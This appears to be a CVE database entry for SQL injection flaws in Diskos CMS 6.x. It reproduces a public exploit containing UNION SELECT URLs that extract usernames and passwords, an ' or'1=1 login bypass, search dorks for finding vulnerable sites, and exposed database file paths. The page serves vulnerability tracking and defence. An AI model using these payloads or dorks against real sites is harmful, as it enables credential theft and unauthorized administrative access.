CVE-2009-4798
Description
Multiple SQL injection vulnerabilities in Diskos CMS 6.x allow remote attackers to execute arbitrary SQL commands via the (1) kat parameter to side.asp, and the (2) brugerid and (3) password fields to the administration login feature.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Diskos CMS Manager - SQL Injection / File Disclosure / Authentication Bypass
************************************************************
** Diskos CMS Manager & multiple vulnerabilitiesS
************************************************************
** Prodcut: Diskos CMS Manager
** Home : http://www.diskos.dk
** Vunlerability : SQL Injection & admin byapass & database disclosure
** Dork : "Powered By diskos"
** inurl:"side.asp?kat=1"
************************************************************
** Discovred by: AnGeL25dZ
** Contact : angel25dz@gmail.com
** *********************************************************
** Greetz to : ALLAH
** All Members of H-T (http://h-t.cc/cc)
** All Members of Islam-attack.com
*************************************************************
******************** SQL Injection **************************
*************************************************************
** Exploit:
** USERS :http://[PATH]/side.asp?kat=-1+union+all+select+brugerid+from+brugere
** ADMIn :http://[PATH]/side.asp?kat=-1+union+all+select+password+from+brugere
**
** Administration Login : http://[path]/diskos6/
**
**************************************************************
********************** Admin bypass **************************
**************************************************************
**
** Administration Login : http://[path]/diskos6/
** brugerid: ' or'1=1
** password: ' or'1=1
****************************************************************
******************** database disclosure **********************
****************************************************************
** http://[path]/db/log.mdb
** artikler_prod.mdb
** medlemmer.mdb
******************************************************************
** Live demo : http://www.diskos.dk/
****************************************************************
# milw0rm.com [2009-03-30]
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| diskos | diskos_cms | 6 | |
References
- http://secunia.com/advisories/34540
- http://www.exploit-db.com/exploits/8307
- http://www.securityfocus.com/bid/34289
- https://exchange.xforce.ibmcloud.com/vulnerabilities/49509
- https://exchange.xforce.ibmcloud.com/vulnerabilities/49510
- http://secunia.com/advisories/34540
- http://www.exploit-db.com/exploits/8307
- http://www.securityfocus.com/bid/34289
- https://exchange.xforce.ibmcloud.com/vulnerabilities/49509
- https://exchange.xforce.ibmcloud.com/vulnerabilities/49510
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.